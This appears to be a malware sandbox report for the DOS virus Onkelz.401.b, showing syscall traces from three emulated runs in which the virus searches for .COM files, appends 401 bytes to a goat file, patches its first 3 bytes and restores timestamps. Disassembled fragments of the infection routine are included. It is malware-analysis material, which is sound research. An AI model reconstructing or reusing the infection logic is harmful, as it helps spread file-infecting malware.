Sample viewer

vx.netlux.org/Virus.DOS.Onkelz.401.b

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:48:27.362521464Z	26	PC: 1329d \| Set disk transfer address
2018-12-17T22:48:27.364228301Z	25	PC: 132ab \| Get default drive
2018-12-17T22:48:27.367400701Z	14	PC: 132b5 \| Set default drive (Drive = 'D')
2018-12-17T22:48:27.374769497Z	78	PC: 132bf \| Find first file
2018-12-17T22:48:27.382317059Z	61	PC: 132cc \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:48:27.390719026Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.392687104Z	62	PC: 132f3 \| Close file
2018-12-17T22:48:27.395065102Z	79	PC: 132bf \| Find next file
2018-12-17T22:48:27.398606426Z	61	PC: 132cc \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:48:27.406211987Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.408127556Z	62	PC: 132f3 \| Close file
2018-12-17T22:48:27.410600002Z	79	PC: 132bf \| Find next file
2018-12-17T22:48:27.414941219Z	61	PC: 132cc \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:48:27.422354398Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.424279896Z	62	PC: 132f3 \| Close file
2018-12-17T22:48:27.434816664Z	79	PC: 132bf \| Find next file
2018-12-17T22:48:27.438100684Z	61	PC: 132cc \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:48:27.445392095Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.44848681Z	62	PC: 132f3 \| Close file
2018-12-17T22:48:27.450842126Z	79	PC: 132bf \| Find next file
2018-12-17T22:48:27.456568846Z	61	PC: 132cc \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:48:27.465867067Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.467759613Z	62	PC: 132f3 \| Close file
2018-12-17T22:48:27.470035119Z	79	PC: 132bf \| Find next file
2018-12-17T22:48:27.474210925Z	61	PC: 132cc \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:48:27.481480645Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.483402436Z	62	PC: 132f3 \| Close file
2018-12-17T22:48:27.485794931Z	79	PC: 132bf \| Find next file
2018-12-17T22:48:27.488605953Z	61	PC: 132cc \| Open file (Filename = 'PAH.COM')
2018-12-17T22:48:27.495771407Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.497962935Z	62	PC: 132f3 \| Close file
2018-12-17T22:48:27.500593257Z	79	PC: 132bf \| Find next file
2018-12-17T22:48:27.503577565Z	61	PC: 132cc \| Open file (Filename = 'TEST.COM')
2018-12-17T22:48:27.510757114Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.513376065Z	87	PC: 132e3 \| Get or set file date and time
2018-12-17T22:48:27.515247221Z	44	PC: 13303 \| Get time 0x13303: or dl, dl 0x13305: je 0x132ff 0x13307: mov byte ptr [bp + 0x117], dl 0x1330b: mov ax, 0x4200 0x1330e: call 0x13390 0x13311: mov ah, 0x3f 0x13313: lea dx, word ptr [bp + 0x22c] 0x13317: mov cx, 3 0x1331a: int 0x21 0x1331c: mov ax, 0x4202 0x1331f: call 0x13390 0x13322: sub ax, 3 0x13325: mov word ptr cs:[bp + 0x22a], ax 0x1332a: lea si, word ptr [bp + 0x106] 0x1332e: mov di, 0xfac8 0x13331: mov cx, 0x191 0x13334: cld 0x13335: rep movsb byte ptr es:[di], byte ptr [si] 0x13337: mov si, 0xfaea 0x1333a: call 0x23286
2018-12-17T22:48:27.517880108Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.52032396Z	63	PC: 1331c \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:48:27.523417143Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.525346768Z	64	PC: 13347 \| Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:48:27.848871483Z	66	PC: 13396 \| Move file pointer
2018-12-17T22:48:27.852199687Z	64	PC: 13358 \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:48:27.855687641Z	87	PC: 1335f \| Get or set file date and time
2018-12-17T22:48:27.858893564Z	62	PC: 13363 \| Close file
2018-12-17T22:48:27.870323851Z	42	PC: 13367 \| Get date 0x13367: cmp dh, dl 0x13369: jne 0x1337c 0x1336b: mov ah, 0x2c 0x1336d: int 0x21 0x1336f: and dh, 7 0x13372: jne 0x1337c 0x13374: mov ah, 9 0x13376: lea dx, word ptr [bp + 0x235] 0x1337a: int 0x21 0x1337c: mov ah, 0x1a 0x1337e: mov dx, 0x80 0x13381: int 0x21 0x13383: mov ah, 0xe 0x13385: mov dl, byte ptr [bp + 0x297] 0x13389: int 0x21 0x1338b: mov ax, 0x100 0x1338e: push ax 0x1338f: ret 0x13390: xor cx, cx 0x13392: xor dx, dx
2018-12-17T22:48:27.886536174Z	26	PC: 13383 \| Set disk transfer address
2018-12-17T22:48:27.889370049Z	14	PC: 1338b \| Set default drive (Drive = 'A')
2018-12-17T22:48:27.891275379Z	9	PC: 12a86 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-17T22:48:27.89746Z	48	PC: 12a8f \| Get DOS version
2018-12-17T22:48:27.899074273Z	61	PC: 12b5c \| Open file (Filename = '')
2018-12-17T22:48:27.90769974Z	93	PC: 12afe \| File sharing functions
2018-12-17T22:48:27.910049415Z	9	PC: 12a86 \| Display string (String= 'Size change=0322h/00802d. ')
2018-12-17T22:48:27.914644098Z	76	PC: 12ae3 \| Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9560,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:19.572245555Z	26	PC: 1329d \| Set disk transfer address
2018-12-25T12:23:19.574471957Z	25	PC: 132ab \| Get default drive
2018-12-25T12:23:19.576358293Z	14	PC: 132b5 \| Set default drive (Drive = 'D')
2018-12-25T12:23:19.577962361Z	78	PC: 132bf \| Find first file
2018-12-25T12:23:19.584929859Z	61	PC: 132cc \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:23:19.600520126Z	66	PC: 13396 \| Move file pointer
2018-12-25T12:23:19.602192661Z	62	PC: 132f3 \| Close file
2018-12-25T12:23:19.604191772Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.607660113Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.614248238Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.615914212Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.618457279Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.62088924Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.627585714Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.629841105Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.631425945Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.633770263Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.640697361Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.642269552Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.643923551Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.647004823Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.653527573Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.655298729Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.657271879Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.660209689Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.667523143Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.670167737Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.671794966Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.674030695Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.681556149Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.683247841Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.685276901Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.688014082Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.694510456Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.697323637Z	87	PC: 132e3 \| Get or set file date and time
2018-12-25T12:23:19.698713308Z	44	PC: 13303 \| Get time 0x13303: or dl, dl 0x13305: je 0x132ff 0x13307: mov byte ptr [bp + 0x117], dl 0x1330b: mov ax, 0x4200 0x1330e: call 0x13390 0x13311: mov ah, 0x3f 0x13313: lea dx, word ptr [bp + 0x22c] 0x13317: mov cx, 3 0x1331a: int 0x21 0x1331c: mov ax, 0x4202 0x1331f: call 0x13390 0x13322: sub ax, 3 0x13325: mov word ptr cs:[bp + 0x22a], ax 0x1332a: lea si, word ptr [bp + 0x106] 0x1332e: mov di, 0xfac8 0x13331: mov cx, 0x191 0x13334: cld 0x13335: rep movsb byte ptr es:[di], byte ptr [si] 0x13337: mov si, 0xfaea 0x1333a: call 0x23286
2018-12-25T12:23:19.700854185Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.702666072Z	63	PC: 1331c \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:23:19.705169966Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.706499156Z	64	PC: 13347 \| Write file or device (Write 401 bytes on handle 5)
2018-12-25T12:23:19.720398863Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.721576607Z	64	PC: 13358 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:23:19.724214589Z	87	PC: 1335f \| Get or set file date and time
2018-12-25T12:23:19.727424851Z	62	PC: 13363 \| Close file
2018-12-25T12:23:19.734922885Z	42	PC: 13367 \| Get date 0x13367: cmp dh, dl 0x13369: jne 0x1337c 0x1336b: mov ah, 0x2c 0x1336d: int 0x21 0x1336f: and dh, 7 0x13372: jne 0x1337c 0x13374: mov ah, 9 0x13376: lea dx, word ptr [bp + 0x235] 0x1337a: int 0x21 0x1337c: mov ah, 0x1a 0x1337e: mov dx, 0x80 0x13381: int 0x21 0x13383: mov ah, 0xe 0x13385: mov dl, byte ptr [bp + 0x297] 0x13389: int 0x21 0x1338b: mov ax, 0x100 0x1338e: push ax 0x1338f: ret 0x13390: xor cx, cx 0x13392: xor dx, dx
2018-12-25T12:23:19.737125793Z	44	PC: 1336f \| Get time 0x1336f: and dh, 7 0x13372: jne 0x1337c 0x13374: mov ah, 9 0x13376: lea dx, word ptr [bp + 0x235] 0x1337a: int 0x21 0x1337c: mov ah, 0x1a 0x1337e: mov dx, 0x80 0x13381: int 0x21 0x13383: mov ah, 0xe 0x13385: mov dl, byte ptr [bp + 0x297] 0x13389: int 0x21 0x1338b: mov ax, 0x100 0x1338e: push ax 0x1338f: ret 0x13390: xor cx, cx 0x13392: xor dx, dx 0x13394: int 0x21 0x13396: ret 0x13397: jmp 0x13d5c 0x1339a: jmp 0x13bce
2018-12-25T12:23:19.740093266Z	26	PC: 13383 \| Set disk transfer address
2018-12-25T12:23:19.741987563Z	14	PC: 1338b \| Set default drive (Drive = 'A')
2018-12-25T12:23:19.743339868Z	9	PC: 12a86 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:23:19.749155987Z	48	PC: 12a8f \| Get DOS version
2018-12-25T12:23:19.750338565Z	61	PC: 12b5c \| Open file (Filename = '')
2018-12-25T12:23:19.756665707Z	93	PC: 12afe \| File sharing functions
2018-12-25T12:23:19.759237488Z	9	PC: 12a86 \| Display string (See above)
2018-12-25T12:23:19.763612356Z	76	PC: 12ae3 \| Terminate with return code (Return code = '1')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9560,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:19.579858404Z	26	PC: 1329d \| Set disk transfer address
2018-12-25T12:23:19.581771049Z	25	PC: 132ab \| Get default drive
2018-12-25T12:23:19.582815378Z	14	PC: 132b5 \| Set default drive (Drive = 'D')
2018-12-25T12:23:19.584070513Z	78	PC: 132bf \| Find first file
2018-12-25T12:23:19.588710157Z	61	PC: 132cc \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:23:19.593375067Z	66	PC: 13396 \| Move file pointer
2018-12-25T12:23:19.59458099Z	62	PC: 132f3 \| Close file
2018-12-25T12:23:19.595992044Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.599503147Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.606671257Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.608245126Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.611012317Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.620699625Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.62694708Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.6291263Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.631148852Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.641134916Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.645682549Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.64759823Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.649011808Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.651932331Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.661152524Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.66366026Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.66694621Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.681543003Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.689048859Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.695863081Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.698711183Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.701529987Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.710982658Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.712847887Z	62	PC: 132f3 \| Close file (See above)
2018-12-25T12:23:19.715990358Z	79	PC: 132bf \| Find next file (See above)
2018-12-25T12:23:19.719074995Z	61	PC: 132cc \| Open file (See above)
2018-12-25T12:23:19.72653787Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.729283503Z	87	PC: 132e3 \| Get or set file date and time
2018-12-25T12:23:19.73151557Z	44	PC: 13303 \| Get time 0x13303: or dl, dl 0x13305: je 0x132ff 0x13307: mov byte ptr [bp + 0x117], dl 0x1330b: mov ax, 0x4200 0x1330e: call 0x13390 0x13311: mov ah, 0x3f 0x13313: lea dx, word ptr [bp + 0x22c] 0x13317: mov cx, 3 0x1331a: int 0x21 0x1331c: mov ax, 0x4202 0x1331f: call 0x13390 0x13322: sub ax, 3 0x13325: mov word ptr cs:[bp + 0x22a], ax 0x1332a: lea si, word ptr [bp + 0x106] 0x1332e: mov di, 0xfac8 0x13331: mov cx, 0x191 0x13334: cld 0x13335: rep movsb byte ptr es:[di], byte ptr [si] 0x13337: mov si, 0xfaea 0x1333a: call 0x23286
2018-12-25T12:23:19.734229773Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.736884233Z	63	PC: 1331c \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:23:19.739848871Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.750031658Z	64	PC: 13347 \| Write file or device (Write 401 bytes on handle 5)
2018-12-25T12:23:19.99395714Z	66	PC: 13396 \| Move file pointer (See above)
2018-12-25T12:23:19.99637797Z	64	PC: 13358 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:23:19.999862827Z	87	PC: 1335f \| Get or set file date and time
2018-12-25T12:23:20.002078461Z	62	PC: 13363 \| Close file
2018-12-25T12:23:20.01127904Z	42	PC: 13367 \| Get date 0x13367: cmp dh, dl 0x13369: jne 0x1337c 0x1336b: mov ah, 0x2c 0x1336d: int 0x21 0x1336f: and dh, 7 0x13372: jne 0x1337c 0x13374: mov ah, 9 0x13376: lea dx, word ptr [bp + 0x235] 0x1337a: int 0x21 0x1337c: mov ah, 0x1a 0x1337e: mov dx, 0x80 0x13381: int 0x21 0x13383: mov ah, 0xe 0x13385: mov dl, byte ptr [bp + 0x297] 0x13389: int 0x21 0x1338b: mov ax, 0x100 0x1338e: push ax 0x1338f: ret 0x13390: xor cx, cx 0x13392: xor dx, dx
2018-12-25T12:23:20.013949665Z	26	PC: 13383 \| Set disk transfer address
2018-12-25T12:23:20.015372918Z	14	PC: 1338b \| Set default drive (Drive = 'A')
2018-12-25T12:23:20.017859638Z	9	PC: 12a86 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:23:20.02484347Z	48	PC: 12a8f \| Get DOS version
2018-12-25T12:23:20.026704028Z	61	PC: 12b5c \| Open file (Filename = '')
2018-12-25T12:23:20.03587756Z	93	PC: 12afe \| File sharing functions
2018-12-25T12:23:20.038531165Z	9	PC: 12a86 \| Display string (See above)
2018-12-25T12:23:20.044078458Z	76	PC: 12ae3 \| Terminate with return code (Return code = '1')